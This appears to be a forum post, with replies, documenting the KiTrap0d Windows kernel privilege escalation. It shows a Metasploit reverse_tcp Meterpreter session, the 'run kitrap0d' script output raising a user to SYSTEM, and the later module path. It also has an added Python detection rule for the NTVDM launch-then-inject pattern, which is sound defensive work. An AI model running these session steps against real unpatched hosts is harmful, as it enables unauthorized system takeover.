Posted more for documentation and historical purposes than as "new hotness".

Original advisory: http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"

Now implemented in Metasploit as a Meterpreter script (`run kitrap0d`), used here from an existing unprivileged session:
```
msf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler on port 443
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.200:50777)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > sysinfo
Computer: WINXPSP3
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter > run ki
run killav      run kitrap0d
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
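The exploit output above is also a neat description of what a defender can see on the host: the unprivileged process launches `C:\WINDOWS\twunk_16.exe`, which starts the 16-bit NTVDM subsystem (`ntvdm.exe`), then opens that process, writes the DLL name into it and creates a thread inside it. The following is an added example, not part of the original post and not code from the Metasploit script or Tavis Ormandy's exploit: a small correlation rule that flags that two-step sequence over constructed process-creation and remote-thread records. The event shape (Sysmon ProcessCreate / CreateRemoteThread style) and all field names, file paths and the benign processes in the sample stream are assumptions made for the example; only the PIDs 1128 and 1316 and the `twunk_16.exe` / temp-file paths come from the session above.

```python
# Added example (not from the original post or the Metasploit module):
# correlate "this process started NTVDM" with "this process created a
# thread inside that NTVDM", the sequence the kitrap0d output shows.
# Event records are constructed to resemble Sysmon ProcessCreate (ID 1)
# and CreateRemoteThread (ID 8) data; the field names are an assumption.
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass
class Event:
    kind: str            # "proc_create" or "remote_thread"
    src_pid: int         # creating / injecting process
    src_image: str
    dst_pid: int         # child pid, or pid that received the thread
    dst_image: str
    cmdline: str = ""    # child command line (proc_create only)


NTVDM_IMAGE = "ntvdm.exe"
# Strings whose presence in a child's command line mean the 16-bit
# subsystem is being started; twunk_16.exe is the stub the exploit runs.
NTVDM_LAUNCH_MARKERS = ("twunk_16.exe", "ntvdm.exe")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def starts_ntvdm(ev: Event) -> bool:
    """True if a proc_create event spawns the NTVDM subsystem."""
    if ev.kind != "proc_create":
        return False
    if _basename(ev.dst_image) == NTVDM_IMAGE:
        return True
    cmd = ev.cmdline.lower()
    return any(marker in cmd for marker in NTVDM_LAUNCH_MARKERS)


def detect_kitrap0d_pattern(events: List[Event]) -> List[Dict]:
    """Report every remote thread created in ntvdm.exe.

    If the same source process started that NTVDM instance earlier in the
    stream, the alert is raised to high severity: that is the exploit's
    own launch-then-inject sequence rather than a stray debugger.
    """
    launched: Dict[int, Set[int]] = {}   # src_pid -> NTVDM pids it started
    alerts: List[Dict] = []
    for ev in events:
        if starts_ntvdm(ev):
            launched.setdefault(ev.src_pid, set()).add(ev.dst_pid)
            continue
        if ev.kind == "remote_thread" and _basename(ev.dst_image) == NTVDM_IMAGE:
            staged = ev.dst_pid in launched.get(ev.src_pid, set())
            alerts.append({
                "src_pid": ev.src_pid,
                "src_image": ev.src_image,
                "ntvdm_pid": ev.dst_pid,
                "severity": "high" if staged else "medium",
                "reason": ("process spawned NTVDM and then injected a thread into it"
                           if staged else "remote thread created in ntvdm.exe"),
            })
    return alerts


# Constructed sample stream: the exploit's own PIDs (1128 -> 1316) from the
# session output, a benign user running a DOS program, and an unrelated
# debugger attaching to notepad. The benign paths are invented.
SAMPLE_EVENTS = [
    Event("proc_create", 1128, r"C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe",
          1316, r"C:\WINDOWS\system32\ntvdm.exe", r"C:\WINDOWS\twunk_16.exe"),
    Event("proc_create", 2000, r"C:\WINDOWS\explorer.exe",
          2100, r"C:\WINDOWS\system32\ntvdm.exe", r"C:\games\doom.exe"),
    Event("remote_thread", 3000, r"C:\tools\debugger.exe",
          3100, r"C:\WINDOWS\system32\notepad.exe"),
    Event("remote_thread", 1128, r"C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe",
          1316, r"C:\WINDOWS\system32\ntvdm.exe"),
]


if __name__ == "__main__":
    for alert in detect_kitrap0d_pattern(SAMPLE_EVENTS):
        print(alert)
```

Run as a script it prints a single high-severity alert for PID 1128 against NTVDM PID 1316; the explorer-launched DOS program and the debugger attaching to notepad produce nothing. A remote thread into `ntvdm.exe` whose creator did not start that instance still surfaces at medium severity, since legitimate reasons to inject into the 16-bit subsystem are rare.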
**Nipple Rub...**
Did anyone try it against Windows 2003 R2 SP1?

Didn't work for me.

I don't have a Release 2 but I think I have a 2k3 Ent SP1. I'll try that.

Where should I put the KiTrap0D.zip file for it to run?

This is an old post from before they built kitrap0d into Meterpreter. You can call it and some others via getsystem and the new post modules.

From the future, 2015. You now have to use the "use exploit/windows/local/ms10_015_kitrap0d" local exploit to abuse the NTVDM.